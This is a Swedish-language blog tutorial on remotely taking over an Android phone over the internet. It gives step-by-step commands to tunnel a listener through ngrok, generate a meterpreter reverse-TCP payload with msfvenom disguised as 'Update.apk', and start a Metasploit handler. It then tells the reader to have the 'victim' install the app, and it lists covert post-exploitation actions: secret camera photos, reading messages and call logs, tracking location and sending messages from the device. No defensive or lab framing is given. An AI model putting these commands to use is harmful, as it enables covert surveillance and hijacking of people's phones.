Hacking Android Device [Remotely]

Hacking over WAN

Du kan kolla in min Video-tutorial på youtube här:
https://youtu.be/Bbp-AcejtHI

I vanliga fall måste du i WAN först ha en statisk IP/Hostname och för det andra måste du göra Port Forwarding för att möjliggöra trafiköverföring, och vi vet alla att båda är så svåra i realtid eftersom vi har begränsad tillgång till portar i ett nätverk.

Så vad vi kommer att göra i det här scenariot är att sätta upp en säker tunnel med hjälp av Ngrok.

Ngrok är ett omvänt proxysystem som upprättar tunnlar från en offentlig slutpunkt, dvs. internet, till en lokalt körd nätverkstjänst. Detta kan hjälpa oss att skapa en offentlig HTTP/HTTPS-URL för en webbplats som körs lokalt i vår maskin. Vi behöver inte göra någon form av port forwarding när vi använder Ngrok och vår nätverkstjänst kommer så småningom att exponeras för internet med hjälp av TCP-tunnling.

Följ dessa steg för att fortsätta:

Steg1: Registrera dig för Ngrok-konto för att ladda ner det.

Först måste du registrera dig för Ngrok-kontot, därefter kommer du att bli ombedd att gå till nedladdningsfönstret.

Fönster för registrering av Ngrok

När du har registrerat dig kan du ladda ner Ngrok för ditt Linuxsystem.

Du behöver bara packa upp den nedladdade filen.

Steg 2: Anslut ditt konto

Att köra det här kommandot kommer att lägga till din auth token i standardkonfigurationsfilen ngrok.yml. Detta ger dig tillgång till fler funktioner och längre sessionstider. (Du måste kopiera och klistra in din egen token här som tillhandahålls på startskärmen för ngrok efter inloggning)

./ngrok authtoken <din token>

Nu är du redo att använda detta verktyg. Öppna din terminal flytta till katalogen där du har extraherat Ngrock-verktyget och skriv:

./ngrok tcp

välja ett portnummer som du vill binda en anslutning på(här har jag valt 5555 som portnummer). Efter att ha tryckt på enter visas en skärm ungefär så här:

Forwardingen här anger TCP-tunneln som ngrok har skapat. Anslutningen har bundits till localhost på port 5555. Nu måste vi generera en skadlig nyttolast med hjälp av msfvenom.

Steg3: Generering av nyttolast

Du kan göra det genom att öppna en ny terminal i din Kali Linux-maskin och sedan skriva följande kod.

msfvenom -p android/meterpreter/reverse_tcp LHOST=2.tcp.ngrok.io LPORT=15787 R> .apk

Men kom ihåg att den här gången är det lite annorlunda än attacken som vi använde oss av i LAN. Här måste vi i stället för IP-adressen ange den vidarebefordringslänk som tillhandahålls i ngrok (2.tcp.ngrok.io). Och portnumret kommer att vara 15787. Kom ihåg att det är viktigt att ange samma portnummer som tillhandahålls av Ngrok i port forwarding.

Notera: Om det inte fungerar att ange IP-adressen 2.tcp.ngrok.io kan du ersätta den med en IP-adress som du kan få fram genom att använda kommandot ”ping”.
Öppna en terminal och skriv ping 2.tcp.ngrok.io och tryck på enter. Du får en IP-adress som du måste sätta i stället för LHOST.

Här har jag använt ”Update.apk” som filnamn för vår nyttolast. Den här filen ska installeras i vår måls Android-enhet. Men innan vi installerar filen måste vi ställa in vår lyssnare. Följ steg 4 för att göra det.

Steg4: Konfigurera en lyssnare

Öppna din terminal och ladda Metasploit-konsolen genom att skriva: msfconsole
När den laddas (efter några sekunder), ladda multi-handler exploit genom att skriva:

use exploit/multi/handler

Inställ nu en omvänd payload genom att skriva:

set payload android/meterpreter/reverse_tcp

Sätt din LHOST som 0.0.0.0 och LPORT som 5555
(Portnumret ska vara detsamma som portnumret som användes för att binda anslutningen i ngrok)

set LHOST 0.0.0.0.0
set LPORT 5555

Till sist skriver du exploit för att starta lyssnaren.

Lyssningsläget är på

Steg5: Installera filen Malicious Update.apk i måltavlans enhet

Låta offret installera appen och köra den så fort den är installerad. När offret rör vid alternativet öppna appen får du tillgång till alla funktioner på android-enheten. Inget kommer dock att visas på enhetens skärm efter att appen har öppnats.

Post-Exploitation

Typ hjälp för att se de olika alternativen som du kan använda för att utföra de olika uppgifterna på offrets enhet.
Du kan få tillgång till deras kamera och ta ett foto utan att meddela dem. Du kan kontrollera deras meddelanden, samtalslistor och spara dem i ditt system också.
Du kan också visa och öppna alla program som är installerade på deras enhet. Du kan till och med få fram användarens aktuella platskoordinater.
Du kan också skicka meddelanden till valfritt kontaktnummer via deras enhet.

Lämna ett svar

Din e-postadress kommer inte publiceras.